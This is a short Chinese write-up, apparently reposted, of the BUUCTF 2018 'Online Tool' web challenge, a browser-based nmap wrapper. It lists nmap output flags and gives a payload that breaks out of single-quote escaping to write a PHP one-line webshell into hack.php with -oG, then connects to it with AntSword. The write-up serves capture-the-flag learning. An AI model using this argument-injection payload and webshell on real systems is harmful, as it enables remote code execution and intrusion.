BUU-WEB-[BUUCTF 2018]Online Tool
Posted TzZzEZ-web
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[BUUCTF 2018]Online Tool相关的知识,希望对你有一定的参考价值。
[BUUCTF 2018]Online Tool
以get方式传入一个host。
主要功能是一个网页版的nmap。
先测试一下自己的主机。
查找一下nmap的参数:
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件
以单引号闭合,构建一个一句话木马,通过蚁剑进行连接。
构建的payload为:
/?host='<?php @eval($_POST["cmd"]);?> -oG hack.php '
上传成功后会有回显地址。
根据地址下的网页,进行蚁剑连接。
以上是关于BUU-WEB-[BUUCTF 2018]Online Tool的主要内容,如果未能解决你的问题,请参考以下文章